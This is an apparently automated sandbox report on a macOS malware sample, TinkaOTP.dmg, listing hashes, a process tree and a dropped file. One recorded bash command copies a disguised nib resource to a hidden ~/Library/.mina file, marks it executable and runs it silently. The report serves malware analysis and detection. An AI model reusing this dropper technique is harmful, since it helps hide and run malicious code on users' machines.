Resubmissions

12-06-2021 11:09

210612-nqn9qdfdq2 10

12-06-2021 11:04

210612-h83qfce7ax 10

12-06-2021 10:49

210612-mkbljdyans 10

04-06-2021 11:41

210604-617hnrwhna 10

03-06-2021 22:37

210603-9ndgvgx33n 10

03-06-2021 17:09

210603-gxrvff2tan 10

03-06-2021 16:24

210603-lv4d7lhgcs 10

Analysis

  • max time network
    155s
  • platform
    macos_amd64
  • resource
    macos
  • submitted
    03-06-2021 17:09

General

  • Target

    TinkaOTP.dmg

  • Size

    6MB

  • MD5

    81f8f0526740b55fe484c42126cd8396

  • SHA1

    fe83d95afce63e935dbe22aef40a164cee34f4e5

  • SHA256

    899e66ede95686a06394f707dd09b7c29af68f95d22136f0a023bfd01390ad53

  • SHA512

    751c2195a47d5e263ccfb860037ce32b5bc3c9ca516b9806a0cf1bae2af9742bcc3c9965218fd938e6c3eaa5a90081ece877aeec56f667477686daa3aeb6d77a

Score
10/10

Malware Config

Signatures

Processes

  • /bin/sh
    sh -c "sudo open /Volumes/TinkaOTP/TinkaOTP.app"
    PID:464
  • /bin/bash
    sh -c "sudo open /Volumes/TinkaOTP/TinkaOTP.app"
    PID:464
  • /usr/bin/sudo
    sudo open /Volumes/TinkaOTP/TinkaOTP.app
    PID:464
    • /usr/bin/open
      open /Volumes/TinkaOTP/TinkaOTP.app
      PID:465
  • /Volumes/TinkaOTP/TinkaOTP.app/Contents/MacOS/TinkaOTP
    /Volumes/TinkaOTP/TinkaOTP.app/Contents/MacOS/TinkaOTP
    PID:466
  • /bin/bash
    /bin/bash -c "cp /Volumes/TinkaOTP/TinkaOTP.app/Contents/Resources/Base.lproj/SubMenu.nib ~/Library/.mina > /dev/null 2>&1 && chmod +x ~/Library/.mina > /dev/null 2>&1 && ~/Library/.mina > /dev/null 2>&1"
    PID:469
    • /bin/cp
      cp /Volumes/TinkaOTP/TinkaOTP.app/Contents/Resources/Base.lproj/SubMenu.nib /Users/run/Library/.mina
      PID:470
    • /bin/chmod
      chmod +x /Users/run/Library/.mina
      PID:471
    • /Users/run/Library/.mina
      /Users/run/Library/.mina
      PID:472

Network

MITRE ATT&CK Matrix

Collection

    Command and Control

      Credential Access

        Defense Evasion

          Discovery

            Execution

              Exfiltration

                Impact

                  Initial Access

                    Lateral Movement

                      Persistence

                        Privilege Escalation

                          Replay Monitor

                          00:00 00:00

                          Downloads

                          • /Users/run/Library/.mina
                            MD5

                            f05437d510287448325bac98a1378de1

                            SHA1

                            fa3deb60b8a2eaa29a7dccf14bee6adae81f442f

                            SHA256

                            846d8647d27a0d729df40b13a644f3bffdc95f6d0e600f2195c85628d59f1dc6

                            SHA512

                            466999585e7b09e729def6e13c719b656ba7ee9ca43ea32c8fb3a6177de81a75caf9bd5eb0c0ac172c2b7fea3c1aa57d10349ff98aac472fe2ffafde8cd30165